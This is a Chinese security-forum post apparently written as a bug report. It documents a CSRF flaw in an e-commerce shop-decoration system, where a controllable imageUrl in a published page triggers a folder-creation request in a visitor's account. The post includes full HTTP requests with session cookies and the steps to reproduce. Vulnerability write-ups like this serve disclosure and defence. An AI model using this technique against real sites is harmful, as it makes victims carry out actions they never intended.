安全矩阵

 找回密码
 立即注册
搜索
查看: 773|回复: 0

某东某系统存在 CSRF 漏洞。

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-8-27 23:11:08 | 显示全部楼层 |阅读模式
某东某系统存在 CSRF 漏洞。
A 账号:

微信小程序-图片链接 url 可控:

  1. POST /decoration/api/element/saveAndPublish HTTP/2
  2. Host: xx.cn
  3. Cookie: __jdv=113905493|goselling.com|-|referral|-|1685667852704;
  4. 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
  5. PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
  6. mfs_lsy_sessionb=1B57ACBC44805946A768BDBBE22E6827;
  7. mfs_lsy_pinb=lsy_38wYlgG2xqj2srM2Kj; tenantCode=selling2;
  8. sp_lsy_session=C9CA7D12DC574BE689C704C5A4259027; sp_lsy_vd=13681143;
  9. hi_belong=Z2YDMOOJEL6N27HUO6OS54X2SQUY5BKOKCPUGSDZPCGKLWF3KGQIO2POUGEAI7KX
  10. TBSARQ253EX3EPC4KSBVGV3B2QOHNPTA3YSQXT5W5M5IOLYA4ND62HTND5BWQR73DT43COTL
  11. HBJEJL26FYG3BNTSOXO23LDO7Q5LKC7ZJQ4XNYRXKODNH5PKLTBXTNUL2IT6EAVFQPYNKAT4LXA
  12. GJEFQLSNG5HGVY6QRGQY; app_code=FEA37492D92D78FAC0C0AC66BEC37C39; shop_type=0;
  13. mfs_user_role=1; mba_muid=1685667852703344777662; navigation=[%22*sl_RrFdTHe%22];
  14. mba_sid=16856679524822945543355525546.19; __jda=216326275.1685667852703344777662.1685667853.1685667853.1685667853.1; __jdb=216326275.23.1685667852703344777662|1.1685667853; __jdc=216326275;
  15. themeId=18595
  16. Content-Length: 8315
  17. Sgm-Context: 213108912045568420;213108912045568420
  18. Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0
  19. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  20. Gecko) Chrome/113.0.0.0 Safari/537.36
  21. Content-Type: application/json
  22. Accept: application/json, text/plain, */* X-Requested-With: XMLHttpRequest
  23. Sec-Ch-Ua-Platform: "macOS" Origin: https://xx.cn
  24. Sec-Fetch-Site: same-origin
  25. Sec-Fetch-Mode: cors
  26. Sec-Fetch-Dest: empty
  27. Referer: https://xx.cn/?elementId=144153&scope=1&hideMiddlePage=false
  28. Accept-Encoding: gzip, deflate
  29. Accept-Language: zh-CN,zh;q=0.9
  30. {"channel":1,"platform":2,"source":1,"traceId":"DESIGN_ezdlul3v","scope":"1","elementType":nu
  31. ll,"floorList":[{"version":"1.0.0","componentPubId":7,"elementId":144153,"floorId":"283125"},{"v
  32. ersion":"1.0.0","componentPubId":8,"elementId":144153,"floorId":"283126"},{"version":"1.0.0", "componentPubId":4,"elementId":144153,"content":"{"searchText":" 请 输 入 搜 索 关 键 词
  33. ","bgColor":"#ffffff","textColor":"#999999","searchColor":"#f4f4f4"}","floorId":"2831
  34. 23"},{"version":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"htt
  35. ps://upload-shop.selling.cn/api/imgcategory/doAdd?parentCateId=0&cateName=csrf-test&key=\ ","hotList":[],"editorImageHeight":3457,"imageHeight":"526.13"}","floorId":"283122"},{"v
  36. ersion":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"//img14.36
  37. 0buyimg.com/saasdecoration/jfs/t1/172081/30/11498/2409/60ae5dd2E06701229/17e3bcd8eae
  38. 06c94.png","hotList":[],"editorImageHeight":180,"imageHeight":"60.00"}","floorId":"283
  39. 124"},{"version":"1.0.0","componentPubId":3,"elementId":144153,"content":"{"colNumber":3, "backgroundColor":"#f4f4f4","productDetailType":1,"sl-skus":{"type":"auto","produc
  40. tNum":6,"list":[],"listResult":[{"skuId":601899904,"skuName":"测试商品 3(系统自动
  41. 创 建 , 可 供 体 验 全 流 程 )
  42. ","originPrice":null,"realPrice":1,"productId":null,"skuStatus":"1","stockStatus":"33\ ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
  43. ,"productName":" 测 试 商 品 3 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  44. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  45. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899928,"
  46. skuName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  47. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
  48. g","productName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  49. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  50. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975005,"
  51. skuName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  52. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
  53. g","productName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  54. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  55. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899906,"
  56. skuName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  57. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":" 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
  58. g","productName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  59. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  60. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975003,"
  61. skuName":" 测 试 商 品 4 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  62. ","originPrice":null,"realPrice":2,"productId":null,"skuStatus":"1","stockStatus":"33\ ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
  63. ,"productName":" 测 试 商 品 4 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  64. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\ "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  65. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899930,"
  66. skuName":" 测 试 商 品 6 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  67. \\">","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus
  68. ":"33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37ba
  69. b8.jpg","productName":" 测 试 商 品 6 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  70. \\">","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":
  71. null,"purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels\ ":"[]","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null}]}}","floorId":"28311
  72. 9"},{"version":"1.0.0","componentPubId":2,"elementId":144153,"content":"{"imageUrl":"//im
  73. g14.360buyimg.com/saasdecoration/jfs/t1/127293/32/19284/3437/60ae5e0cEe3a32a72/1b07afaa63f15aaf.png","hotList":[],"editorImageHeight":180,"imageHeight":"60.00"}","floorId"
  74. :"283121"},{"version":"1.0.0","componentPubId":3,"elementId":144153,"content":"{"colNumbe
  75. r":2,"backgroundColor":"#f4f4f4","productDetailType":1,"sl-skus":{"type":"auto","p
  76. roductNum":4,"list":[],"listResult":[{"skuId":601899904,"skuName":"测试商品 3(系统
  77. 自 动 创 建 , 可 供 体 验 全 流 程 )
  78. ","originPrice":null,"realPrice":1,"productId":null,"skuStatus":"1","stockStatus":"33\

  79. ","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jpg"
  80. ,"productName":" 测 试 商 品 3 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  81. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\

  82. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  83. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899928,"
  84. skuName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  85. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"

  86. 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
  87. g","productName":" 测 试 商 品 2 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  88. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\

  89. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  90. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":604975005,"
  91. skuName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  92. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"

  93. 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
  94. g","productName":" 测 试 商 品 1 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  95. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\

  96. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  97. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null},{"skuId":601899906,"
  98. skuName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  99. ","originPrice":null,"realPrice":0.01,"productId":null,"skuStatus":"1","stockStatus":"

  100. 33","skuImageUrl":"jfs/t1/162874/30/1099/76131/5ff46cdfE3a4153b5/974b0066ff37bab8.jp
  101. g","productName":" 测 试 商 品 5 ( 系 统 自 动 创 建 , 可 供 体 验 全 流 程 )
  102. ","newerFlag":0,"memberPrice":null,"gradeCode":null,"templateId":null,"mspd":null,\

  103. "purchaseNum":null,"purchasePrice":null,"purchaseMessage":null,"promotionLabels":"[]
  104. ","presaleFlag":null,"presalePrice":null,"isHideRealPrePrice":null}]}}","floorId":"283120"}],"

  105. pageConfig":{"componentPubId":9,"version":"1.0.0","elementId":144153,"type":"1","content":"{
  106. "titleText":" 好 物 旗 舰 店
  107. ","isMessage":1,"isShare":1,"isShopInfo":1,"validated":true,"isAppShopNav":2}"},"ele
  108. mentId":144153,"needPublish":1}
复制代码

数据包
content 参数里 imageUrl 可控


该 url,为图片空间中新建文件夹 csrf-poc

csrf-poc 数据包:


  1. GET /api/imgcategory/doAdd?parentCateId=0&cateName=csrf-test&key= HTTP/2
  2. Host: xx.cn
  3. Cookie: __jdv=113905493|goselling.com|-|referral|-|1685667852704;
  4. 3AB9D23F7A4B3C9B=FIH6HCA4K25HNQKDQDC2TQWRTECH5S2VIAB3N47EMB3BAXCGEVY7EX63
  5. PWYRXD6YOH4CG2GUYFJB7HA4RMUMWTOFT4;
  6. mfs_lsy_sessionb=1B57ACBC44805946A768BDBBE22E6827;
  7. mfs_lsy_pinb=lsy_38wYlgG2xqj2srM2Kj; tenantCode=selling2;
  8. sp_lsy_session=C9CA7D12DC574BE689C704C5A4259027; sp_lsy_vd=13681143;
  9. hi_belong=Z2YDMOOJEL6N27HUO6OS54X2SQUY5BKOKCPUGSDZPCGKLWF3KGQIO2POUGEAI7KX
  10. TBSARQ253EX3EPC4KSBVGV3B2QOHNPTA3YSQXT5W5M5IOLYA4ND62HTND5BWQR73DT43COTL
  11. HBJEJL26FYG3BNTSOXO23LDO7Q5LKC7ZJQ4XNYRXKODNH5PKLTBXTNUL2IT6EAVFQPYNKAT4LXA
  12. GJEFQLSNG5HGVY6QRGQY; app_code=FEA37492D92D78FAC0C0AC66BEC37C39; shop_type=0;
  13. mfs_user_role=1; mba_muid=1685667852703344777662; navigation=[%22*sl_RrFdTHe%22];
  14. themeId=18595; mba_sid=16856679524822945543355525546.42; __jda=178808869.1685667852703344777662.1685667853.1685667853.1685667853.1; __jdc=178808869; __jdb=178808869.29.1685667852703344777662|1.1685667853
  15. Sec-Ch-Ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24" Accept: application/json, text/javascript, */*; q=0.01
  16. Sec-Ch-Ua-Mobile: ?0
  17. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  18. Gecko) Chrome/113.0.0.0 Safari/537.36
  19. Sec-Ch-Ua-Platform: "macOS" Origin: https://xx.cn
  20. Sec-Fetch-Site: same-site
  21. Sec-Fetch-Mode: cors
  22. Sec-Fetch-Dest: empty
  23. Referer: https://xx.cn/
  24. Accept-Encoding: gzip, deflate
  25. Accept-Language: zh-CN,zh;q=0.9
复制代码

复制链接,b 账号访问




再去看看 b 账号图片管理中是否多了一个 csrf-test 文件夹。如果有则存在该漏洞。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:52 , Processed in 0.012750 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表